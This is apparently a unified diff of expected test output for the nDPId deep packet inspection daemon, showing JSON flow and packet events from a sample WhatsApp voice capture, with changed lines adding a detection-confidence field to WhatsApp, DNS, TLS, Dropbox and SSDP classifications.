 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688704,"flow_last_seen":1561455688704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1561455688704,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1561455688704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1561455688704,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd7AqAIMnfAUNcDLFGab0QrZAAAAALDC\/\/8eGAAAAgQFtAEDAwYBAQgKNM3yoAAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1561455688744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1561455688744,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uKd8BQ1wKgCDBRmwMsu6BkVm9EK2qASbHAbGAAAAgQFeAQCCAoefUIDNM3yoAEDAwg="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1561455688841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1561455688841,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxerAqAIMnfAUNcDLFGab0QraLugZFoAQCAytcgAAAQEICjTN8zsefUID"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1561455689728,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1561455689728,"pkt":"xiwDYGpkkLkxKPrKCABFAABL058AAP8RYqTAqAIMwKgCAdgAADUAN5FDM2kBAAABAAAAAAAADG1lZGlhLW14cDEtMQNjZG4Id2hhdHNhcHADbmV0AAABAAE="}
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1561455689761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1561455689761,"pkt":"kLkxKPrKxiwDYGpkCABFAABbphoAAEARTxrAqAIBwKgCDAA12AAAR3hsM2mBgAABAAEAAAAADG1lZGlhLW14cDEtMQNjZG4Id2hhdHNhcHADbmV0AAABAAHADAABAAEAAABFAAQfDVYz"}
-00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1561455689761,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.51"}}
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1561455689761,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.51"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689909,"flow_last_seen":1561455689909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1561455689909,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1561455689909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1561455689909,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGAsTAqAIMHw1WM8VHAbtOnG1kAAAAALDC\/\/9BlgAAAgQFtAEDAwcBAQgKNM4E3wAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1561455689928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1561455689928,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFQGLsgfDVYzwKgCDAG7xUfuAwj8TpxtZaASbHDC9wAAAgQFeAQCCAqHqaVzNM4E3wEDAwg="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1561455690036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1561455690036,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGAtDAqAIMHw1WM8VHAbtOnG1l7gMI\/YAQBAZZdQAAAQEICjTOBV2HqaVz"}
-00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455689909,"flow_last_seen":1561455690039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1561455690039,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455689909,"flow_last_seen":1561455690058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1561455690058,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455689909,"flow_last_seen":1561455690039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1561455690039,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455689909,"flow_last_seen":1561455690058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1561455690058,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1561455701309,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"ts_msec":1561455701309,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxXcMAAEARlWjAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1561455701310,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"ts_msec":1561455701310,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFvHu4AAEAR1D\/AqAIBwKgC\/0RcRFwBW7HJeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsxMTgyMzk1NTczLCAxNDIxMTE0Mzk5LCAxODA4MDQ3NjgwLCAxMzcyMDkyNjA5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNTI1ODAwNzEyMCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNDUxNDcyNjU4LCA0MTc0NjUwODgwLCAyODUyMTYwNywgMTQxNTYyMDM1MF19"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455702980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1561455702980,"pkt":"kLkxKPrKxiwDYGpkCABFAgBT1H4AAC8Gs3ARqy9VwKgCDAG7xUbop23K2+r6qYAYAEJmGwAAAQEICipMBbM0zcKkFQMDABo0yWx0nf4Y8Lruj7Xpo7KOiHQ6o5fprSXAlA=="}
@@ -44,37 +44,37 @@
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1561455703144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1561455703144,"pkt":"xiwDYGpkkLkxKPrKCABFAgBTAABAAEAGNu\/AqAIMEasvVcVGAbvb6vqp6KdtyoAYBACmYwAAAQEICjTOOFoqS5CDFQMDABoAAAAAAAAAAyfFNdvhqDfXGuNhDL9lpNkkKA=="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1561455704556,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455704556,"pkt":"AQBef\/\/62DBiVgAcCABFAACa1ogAAP8Rp9yp\/qL07\/\/\/+sTQB2wAhsguTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455704556,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455704557,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1561455704557,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455704557,"pkt":"AQBef\/\/6xiwDYGpkCABFAACadbUAAAERkPrAqAIB7\/\/\/+sTQB2wAhlJ4TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":198,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455704557,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
